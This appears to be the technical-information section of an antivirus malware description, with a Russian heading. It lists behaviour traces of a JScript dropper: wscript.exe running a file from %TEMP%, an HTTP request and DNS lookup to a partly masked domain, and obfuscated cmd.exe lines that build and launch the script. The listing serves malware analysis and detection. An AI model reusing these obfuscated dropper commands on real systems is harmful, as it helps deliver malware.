Техническая информация
- '<SYSTEM32>\wscript.exe' %TEMP%\kJp.js
- %TEMP%\kjp.js
- http://jw####.wdek0phu8.online/?1/
- DNS ASK jw####.wdek0phu8.online
- '<SYSTEM32>\cmd.exe' /S /D /c" sEt/p VE5RQ="%SXRU:OplW=%%5TRT:GGTDD=/%" 0<nul 1>%TEMP%\kJp%URY%s"
- '<SYSTEM32>\cmd.exe' /S /D /c" md \ |"
- '<SYSTEM32>\cmd.exe' /S /D /c" echo stArt <SYSTEM32>\wsCript.eXe %TEMP%\kJp%URY%s"
- '<SYSTEM32>\cmd.exe'